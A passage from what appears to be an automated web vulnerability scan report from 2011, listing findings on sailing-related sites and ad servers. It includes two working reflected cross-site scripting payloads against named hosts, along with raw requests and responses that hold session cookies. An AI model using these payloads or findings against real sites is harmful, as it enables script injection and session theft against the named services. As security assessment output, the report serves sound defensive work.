3.40. http://www.yachtscoring.com/event_results_cumulative.cfm [eID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtscoring.com
Path:   /event_results_cumulative.cfm

Issue detail

The value of the eID request parameter is copied into the HTML document as plain text between tags. The payload 8d752<img%20src%3da%20onerror%3dalert(1)>fff5a8dd9fc was submitted in the eID parameter. This input was echoed as 8d752<img src=a onerror=alert(1)>fff5a8dd9fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /event_results_cumulative.cfm?eID=4088d752<img%20src%3da%20onerror%3dalert(1)>fff5a8dd9fc HTTP/1.1
Host: www.yachtscoring.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Invalid data 4088d752<img src=a onerror=alert(1)>fff5a8dd9fc for CFSQLTYPE CF_SQL_INTEGER.
Connection: close
Date: Thu, 20 Jan 2011 00:54:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=6963885;expires=Sat, 12-Jan-2041 00:54:31 GMT;path=/
Set-Cookie: CFTOKEN=55082400;expires=Sat, 12-Jan-2041 00:54:31 GMT;path=/
Set-Cookie: CFID=6963885;path=/
Set-Cookie: CFTOKEN=55082400;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">


                               
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 4088d752<img src=a onerror=alert(1)>fff5a8dd9fc for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.41. http://k.collective-media.net/cmadj/cm.martini/ [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.martini/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9aed"%3balert(1)//1078342a1b4 was submitted in the cli cookie. This input was echoed as e9aed";alert(1)//1078342a1b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.martini/;sz=728x90;net=cm;ord=3271752524;ord1=707118;cmpgurl=http%253A//www.sailinganarchy.com/index_page1.php? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3e9aed"%3balert(1)//1078342a1b4; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 20 Jan 2011 00:30:28 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:28 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:28 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Thu, 27-Jan-2011 00:30:28 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Thu, 20-Jan-2011 08:30:28 GMT
Content-Length: 7906

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11d765b6a10b1b3e9aed";alert(1)//1078342a1b4&seg_code=noseg&ord=1295483428");CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif");CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii93kdn349&re
...[SNIP]...

4. Cleartext submission of password  previous  next
There are 7 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


4.1. http://americascup.mediaaccess.evolix.net/index.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://americascup.mediaaccess.evolix.net
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: americascup.mediaaccess.evolix.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:36:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

4.2. http://digg.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:40:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899127717691648%3A164; expires=Fri, 21-Jan-2011 00:40:18 GMT; path=/; domain=digg.com
Set-Cookie: d=e77e75edfe85a5c092ebbce18a8db8a109d3f58ee422bb99aa8f404c459dbd21; expires=Tue, 19-Jan-2021 10:47:58 GMT; path=/; domain=.digg.com
X-Digg-Time: D=28518 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

4.3. http://translate.googleusercontent.com/translate_c  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://translate.googleusercontent.com
Path:   /translate_c

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /translate_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&prev=_t&rurl=translate.google.com&usg=ALkJrhglTnSTIWJRTLWJxtBONK41T28E_A HTTP/1.1
Host: translate.googleusercontent.com
Proxy-Connection: keep-alive
Referer: http://translate.google.com/translate_p?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&prev=_t&usg=ALkJrhjG6jHf6mTOkkomcii4GFk9D7ZJWg
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:16:30 GMT
Expires: Thu, 20 Jan 2011 00:16:30 GMT
Cache-Control: private, max-age=86400
Accept-Ranges: none
Content-Location: http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=4d976405d4b1f367:TM=1295482589:LM=1295482590:S=snr5DTM1C3a-1gdp; expires=Sat, 19-Jan-2013 00:16:30 GMT; path=/; domain=translate.googleusercontent.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 139858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns=http://www.w3.org/1999/xhtml><head><script>(function (){ function t
...[SNIP]...
</h5><form action=/servicios/noticias/comentarios/login name=formulario_login_comentarios id=formulario_login_comentarios method=post> <span onmouseover="_tipon(this)" onmouseout="_tipoff()">
...[SNIP]...
</span> <input type=password id=formulario_login_comentarios_clave name=clave maxlength=50 value="" /><div class=aviso>
...[SNIP]...

4.4. http://www.americascupmedia.com/index.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:44:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

4.5. http://www.regattaregatta.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regattaregatta.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.regattaregatta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 20 Jan 2011 00:50:26 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: 9d1da0e50aa9b6d723bb7d2254c4deb6=f2f5e593b3e0e56bdba4d7906218ec7f; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Fri, 21-Jan-2011 00:50:26 GMT; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Thu, 20 Jan 2011 00:50:26 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<div class="hellomid">
               <form action="/index.php/component/user/?task=login" method="post" name="form-login" id="form-login" >
                                       <fieldset class="input">
...[SNIP]...
<br />
                           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
                       </label>
...[SNIP]...

4.6. http://www.usaca.info/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usaca.info
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.usaca.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:51:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 3730abe3084fe49ecac82b2df16b8c34=6f9bhkba6goll5j4caq4ddjh17; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Tue, 10-Jan-2012 00:51:33 GMT; path=/
Last-Modified: Thu, 20 Jan 2011 00:51:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</h3>
                   <form action="index.php" method="post" name="form-login" id="form-login" >
   USACA Contributor Login:    <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
       </label>
...[SNIP]...

4.7. http://www.w-w-i.com/velux_5_oceans_2010_race/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.w-w-i.com
Path:   /velux_5_oceans_2010_race/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:51:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=13c7e006f0c56b998c7eef7ea57f3854; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Velux 5 Oceans 2010 Race :: Online Press Office</title>
<meta name=
...[SNIP]...
<div id="search3" class="search"><form method="post" enctype="multipart/form-data" action="/velux_5_oceans_2010_race/logoffon.php"><div>
...[SNIP]...
<br><input type="password" name="pword" id="pword"><br>
...[SNIP]...

5. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-93054228_1295482822%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D405617%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D423951444%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb778475=5_[r^XI()vrO@Pn0nf8M!j@7*?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviPzkMt5lmDXglBWHfHSmrEELGfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAA_gYBAgUCAAUAAAAAlR4hLwAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482822%29%3Buf%28%27r%27%2C+151609%2C+1295482822%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2811%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2887%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28619%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28620%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28621%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)'qHqWd-AGmScENVx-p:Y9b66ZCJLN[8yvY$hcwDwhp^RbpUUZcwln=gw`]wKC0A)'9Dj6XfCjr1a#[D:I(3<csJ3xssMdQ3gcc=Zx1u*B$99h/3z-gm; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:20:22 GMT
Content-Length: 504

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://tap.rubiconproject.com/oz/feeds/appnexus/tokens?token=4760492999213801733&expires=30" width="1" height="1"/>');

6. Password field submitted using GET method  previous  next
There are 3 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


6.1. http://americascup.mediaaccess.evolix.net/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://americascup.mediaaccess.evolix.net
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: americascup.mediaaccess.evolix.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:36:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

6.2. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:40:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899127717691648%3A164; expires=Fri, 21-Jan-2011 00:40:18 GMT; path=/; domain=digg.com
